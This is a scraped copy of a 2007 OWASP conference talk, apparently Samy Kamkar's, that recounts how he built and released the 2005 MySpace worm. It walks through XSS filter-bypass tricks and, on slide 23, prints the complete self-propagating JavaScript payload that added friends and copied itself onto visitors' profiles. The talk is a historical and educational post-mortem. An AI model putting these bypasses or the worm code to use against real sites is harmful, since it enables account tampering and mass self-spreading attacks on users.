<<  Early Bird Catches the Worm: The Causal Impact of Pre-school Participation and Teacher Qualifications on Year 3 NAPLAN Cognitive Tests Title of the Presentation (26 pt)  >>
The MySpace Worm
The MySpace Worm
Who is samy
Who is samy
MySpace, a place for (potential girl)friends
MySpace, a place for (potential girl)friends
Nice profile
Nice profile
Chicks Dig Cool Profiles
Chicks Dig Cool Profiles
Dont Try This At Home
Dont Try This At Home
Initial Investigation, samy, web 2.0 P.I
Initial Investigation, samy, web 2.0 P.I
Just a JavaScriptKiddie
Just a JavaScriptKiddie
I Hope They Serve Beer In Quote Hell
I Hope They Serve Beer In Quote Hell
Watch Your Language
Watch Your Language
Oops, IE Did It Again
Oops, IE Did It Again
Quote Me, Baby, One More Time
Quote Me, Baby, One More Time
Use The Source, Luke
Use The Source, Luke
Tracking Profile Views / Stalkers
Tracking Profile Views / Stalkers
Im Good Enough, Im Smart Enough And Doggone It, People Like Me
Im Good Enough, Im Smart Enough And Doggone It, People Like Me
AJAX Cross-Domain Security
AJAX Cross-Domain Security
AJAX Cross-Domain Security Redux
AJAX Cross-Domain Security Redux
The Geek Who Became A Friend
The Geek Who Became A Friend
Friend Is A Four Letter Word
Friend Is A Four Letter Word
API, SDK, other cool buzzwords
API, SDK, other cool buzzwords
The MySpace Worm
The MySpace Worm
T Minus 1
T Minus 1
In the end, there was code
In the end, there was code
Launching The Popularity Program
Launching The Popularity Program
The Morning After (no pill to stop this)
The Morning After (no pill to stop this)
2^<insert hard math stuff here>
2^<insert hard math stuff here>
Friends Till The end
Friends Till The end
Taking It All Back
Taking It All Back
Not So Refreshing
Not So Refreshing
The MySpace Worm
The MySpace Worm
All Your MySpace Are Belong To Me
All Your MySpace Are Belong To Me
My Bad
My Bad
The Last Supper
The Last Supper
Love & Hate
Love & Hate
Until
Until
Q&A
Q&A
The Anti-Anti-Samy Project
The Anti-Anti-Samy Project

: 2007. : OWASP. : 2007.ppt. zip-: 295 .

2007

2007.ppt
1 The MySpace Worm

The MySpace Worm

Samy Kamkar Co-founder, Fonality samy@fonality.com

2 Who is samy

Who is samy

Known only by the pseudonym samy (and also by full name, Samy Kamkar) Co-founder of Fonality, IP PBX Phone Systems Developer (and lover) of topics including: Automated Security Vulnerability Research Low-level Packet Fu Artificial Intelligence The Web, as the kids are calling it these days Chick Magnet

3 MySpace, a place for (potential girl)friends

MySpace, a place for (potential girl)friends

Social Networking. Online. Classy. A mildly addictive, web-based stimulant Ability to add friends, bio, favorite music, heroes, etc. Pics. Lots of pics. Not enough hugs or friends as a child (why isnt there a One Hug Per Child project?) Realistically, a great place and efficient method to keep up with friends, family, and girlfriends

3

4 Nice profile

Nice profile

Wanna friend?

Goals of every MySpace User Persuade peers from high school whom you sat next to, but never spoke with, to accept your friend request Have many friends Have many comments Have many pictures If youre a girl, pose only in The MySpace Angles If youre a guy, pose shirtless All other pictures are subject to removal Have a flashy profile (no pun intended), including customized CSS, Flash, and <blink>! Its totally coming back

5 Chicks Dig Cool Profiles

Chicks Dig Cool Profiles

Goals of samys profile See what all the MySpace fuss was about Impress my friends Impress my girlfriend Impress her hot friends Learn AJAX This took place in 2005 when Google Maps was just released No malicious intentions, of course.

6 Dont Try This At Home

Dont Try This At Home

The following methods no longer apply to MySpace. They did apply in 2005 when The MySpace Worm was released. All issues were promptly resolved by MySpace.

7 Initial Investigation, samy, web 2.0 P.I

Initial Investigation, samy, web 2.0 P.I

Character and Tag Limitations In this case, I wanted to add HTML and lengthen my profile title Some limitations were simply imposed by HTML tags: <input type=text maxlength=120 name=title> Remove the maxlength, submit, voila Some limitations were done on the backend smart! Some changes were limited at an interim step (confirmation page) when making changes after stripping nasty stuff: Step 1: Change title to I rule. <img src=britney.jpg> Step 2: Page comes back with hidden values: <input type=hidden name=title value=I rule.> <input type=hidden name=hash value=BADC0DEDDEADBEEF> Step 3: Profit. I mean, submit after changing hidden values

8 Just a JavaScriptKiddie

Just a JavaScriptKiddie

First attempt to inject JavaScript: Body of page only allows: <img>, <embed>, <div> All other tags blocked (<script>, <body>, etc) onAnythings blocked (<a onClick=>) Hrefs with anything other than an http URL blocked expression property in CSS Browser Wars Thanks IE, Safari, I love you guys so much. (FF FTW) JavaScript, invading a CSS tag near you: <div style="background:url('javascript:alert(1)')">

9 I Hope They Serve Beer In Quote Hell

I Hope They Serve Beer In Quote Hell

Single and double quotes used up just to get to a point to add JavaScript Writing any useful JS would require additional quotes MySpace removes attempts to escape quotes (e.g. \) <div style="background:url('javascript:alert(\hi\)')"> will not work Think outside of the tag move our actual javascript elsewhere, then evaluate it: <div id=mycode" expr="alert('ha ha!')" style="background:url(javascript: eval(document.all.mycode.expr) ')">

10 Watch Your Language

Watch Your Language

Aw man, these guys are good. javascript is removed from ANYWHERE. Even smarter, they replace javascript with .. An attack like jjavascriptajavascriptvjavascripta will not work due to the replacement of the text (ends up j..a..v..a..etc) I cant even say I love JavaScript! in my profile ? Luckily, I do in fact love semi-ellipses. I love ..! They really add..suspense..to language. Then I had this fuzzy feeling..

11 Oops, IE Did It Again

Oops, IE Did It Again

Fudging (well, fuzzing) a new solution It was only a few minutes, but I felt close, as I typically do after a few minutes I had to somehow get the javascript word in there A little fuzzer later, placing every possible character between the words java and script to see if any browser would accept itIE & Safari, loose again: <div id="mycode" expr="alert('hah!')" style="background:url('java<newline> script:eval(document.all.mycode.expr)')"> Great success!

12 Quote Me, Baby, One More Time

Quote Me, Baby, One More Time

JavaScript is now a reality! Veni, vidi, vici. Still some hurdles! Although we have single quotes available to us, we sometimes need double quotes. Decimal to ASCII solves this by storing the double quote in a variable: expr=var A=String.fromCharCode(34); alert(A + air quotes + A); Equivalent to alert(air quotes)

13 Use The Source, Luke

Use The Source, Luke

Change In a relationship to In a hot relationship Submitting relationship status was a dropdown with numeric IDs as the values, not text Submitting text as the value would fail Overlaying DIVs is possible but can be painful JS at our disposal, thus, lets simply replace source in the page: document.body.innerHTML = document.body.innerHTML.replace( In a relationship, In a <b>hot</b> relationship); MySpace stops this! They replace innerHTML with .. To avoid the replacement, we simply chunk our data: eval(document.body.inn + erHTML = document);

14 Tracking Profile Views / Stalkers

Tracking Profile Views / Stalkers

Next goal: Tracking visitors Trivial using several methods Using an <img> pointing to a remote CGI Instead, without even using JS or a remote CGI, accomplish with a simple GET request Using the Add To Favorites link allows you to add a user to your Favorites list Only a GET is required to accomplish this To add a friend, you need their Friend ID To avoid JS, we accomplish this with the reverse -- have all visitors to my profile add ME as their favorite, then I can go in and view all people who have added ME as a favorite

15 Im Good Enough, Im Smart Enough And Doggone It, People Like Me

Im Good Enough, Im Smart Enough And Doggone It, People Like Me

AJAX 101 -- Introduction to Browser Control Goal: Add myself as a friend to any visitor: Perform a GET to a confirmation page with a profile ID Perform a POST to confirm the add, submitting a hidden, random hash value AJAX allows us to do this seamlessly in the background AJAX performs the GET request via XMLHttpRequest object Scrape the source for the randomized hash AJAX performs the submit via the same object, setting the randomized hash as a POST parameter, using existing cookies It doesnt work! Profiles are on profile.myspace.com, but editing profiles is on www.myspace.com!

16 AJAX Cross-Domain Security

AJAX Cross-Domain Security

Browsers prevent the XMLHttpRequest object from POSTing to URLs not in the same FQDN (Fully Qualified Domain Name) Cant post from profile.myspace.com to www.myspace.com Misdirection. What the eyes see MySpace is lenient, allowing you to view profiles on both profile.myspace.com and www.myspace.com Simply perform a redirect if were on profile.myspace.com! if (location.hostname == 'profile.myspace.com') document.location = 'http://www.myspace.com' + location.pathname + location.search;

17 AJAX Cross-Domain Security Redux

AJAX Cross-Domain Security Redux

An alternative: XSS (Cross-Site Scripting) By locating an XSS on www.myspace.com, we can: Still directly be on profile.myspace.com Remove the need to perform an obvious redirect Perform an AJAX POST to www.myspace.com Still harness the clients cookies on www.myspace.com A simple Flash app makes this easy Remember, <embed>s are allowed but allowScript=no Harnessing a statically named hidden iframe which already existed on all profiles to direct our XSS page to Using ActionScripts getURL() function to make the call getURL(http://www.myspace.com/xss..<script>, iframe)

18 The Geek Who Became A Friend

The Geek Who Became A Friend

The Friend Who Became A Hero.

Not only could I add myself as a friend, but I could modify any victim, er, visitors profile 1) Choose your target I selected the heroes section of the profile, a seldom used section where you can list your heroes 2) Approach indirectly A standard POST to the heroes section would have removed their existing list. A hero would do no such thing. To prevent this, we need to: GET the visitors profile Extract the existing heroes Append but most of all, samy is my hero.

19 Friend Is A Four Letter Word

Friend Is A Four Letter Word

GETting the users profile In order to retrieve the users profile, we need to know their profile ID This was only available in one place on my profile which they were visiting, ironically in an unused portion of code -- it was not available in the cookie We can extract this simply from the innerHTML: document.body.innerHTML.indexOf('friendID'); Oddly, this fails! Were left with the index (location) of the javascript code where the word friendID begins, as the javascript also exists in the innerHTML Avoid this by performing: document.body.innerHTML.indexOf(frie + ndID);

20 API, SDK, other cool buzzwords

API, SDK, other cool buzzwords

There are patterns everywhere in nature. To accomplish adding friends, revealing myself as a (self-proclaimed) hero, and more, I almost always need to perform the same tasks Building an API makes all of these functions very simple addFriend(profileID) addFavorite(hero, Dr. House) addComment(profileID, Man, samy, you rock!)

21 The MySpace Worm

The MySpace Worm

Putting it all together Perform the redirect if necessary Add our visitor as a friend Get the visitors heroes, append myself What if we capture the source code doing all thisand add that to the visitors profile, too? 5 people view my profile, samy has 5 new friends 5 people each view those profiles, samy has 25 more friends!

22 T Minus 1

T Minus 1

First attempt at running it -- doesnt work! Too much data to post! Time to minimize our JS Try again Now, while I get added as a friend and hero, the code doesnt work on the users profile Ah hah! URI Escaping is necessary when reposting the code JavaScripts escape() does not escape everything we need, so we create a manual escape function

23 In the end, there was code

In the end, there was code

<div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{ var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}functi on getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS }var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.loca tion='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return fin dIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N +='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+' ='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ== 'POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.se nd(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.in dexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(B G=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.sub string(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){ Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC .substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, s amy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU, 'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken') ;var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fusea ction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}v ar AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['int erest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing, 'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&My token='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&f riendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.respons eText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID'] ='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',pa ramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.op en(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHea der('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

24 Launching The Popularity Program

Launching The Popularity Program

Sunday night, around midnight Released the worm into my profile Without testing, I assumed it wouldnt work. It worked. Friends girlfriend (victim) viewed my profile. She was totally checking me out.

25 The Morning After (no pill to stop this)

The Morning After (no pill to stop this)

Monday Morning, 8am You have 221 friend requests. Whoa. If 200 people infected in 8 hours Thats 600 friends a day! Whoa.

26 2^<insert hard math stuff here>

2^<insert hard math stuff here>

1 hour later, 9am You have 480 friend requests. Oh wait. Its exponential, isnt it. Shit.

27 Friends Till The end

Friends Till The end

1 hour later, 10am You have 1,061 friend requests. People messaging me left and right How did you hack my profile? Youre hot! (From girls. And one guy.) I delete you but you come right back! Visitor attempts to delete me as a friend Visitor goes back to their main profile page where the code lives Visitor re-infects him or herself

28 Taking It All Back

Taking It All Back

1:30pm, Im up to 10,000 friends (theyre not really my friends, I havent even met most of these people.) Im scared. I delete my profile. Are you sure? YES! *click* Deletion takes up to 24 hours. Crap. Deleting the profile cant actually stop the worm. MySpace recently purchased by FOX ($580 mil)

29 Not So Refreshing

Not So Refreshing

Spreading like an STD. For an Internet Condom, see next talk. ... 6pm, I refresh the page. 917,664 friend requests 3 seconds later, refresh. 918,268 friend requests 3 seconds later, refresh. 919,664 friend requests

30 The MySpace Worm
31 All Your MySpace Are Belong To Me

All Your MySpace Are Belong To Me

A minute later, I refresh. You have 1,005,831 friend requests. Its official. Im popular.

32 My Bad

My Bad

An hour later, I refresh once more. This profile is unavailable. Finally, they took care of my profile! Good! I visit my girlfriends profile. This profile is unavailable. I visit myspace.com. We are temporarily down for maintenance. Uh oh.

33 The Last Supper

The Last Supper

I decide to enjoy whatever freedom I have left. I drive to Chipotle and have a burrito. An hour later, someone tells me everything is back up -- Im relieved to hear this. ... My girlfriend calls me and tells me, youre my hero. In my panicked state, I dont get the joke until the next day.

34 Love & Hate

Love & Hate

The press was interested. Interviews were taken. T-shirts were created. Friends were made and lost. Copycats emerged. Samy.Reloaded and others Worm code reused on other sites. No word from MySpace.

35 Until

Until

The Secret Service raided my home. And office. They even took my iPod.

36 Q&A

Q&A

A gentleman never asks, a lady never tells. The MySpace Worm: http://namb.la/popular Technical explanation: http://namb.la/popular/tech.html

37 The Anti-Anti-Samy Project

The Anti-Anti-Samy Project

Coming soon.

2007
http://900igr.net/prezentacija/anglijskij-jazyk/kak-udalit-muzyku-iz-2007-187690.html
c

29
900igr.net > > > 2007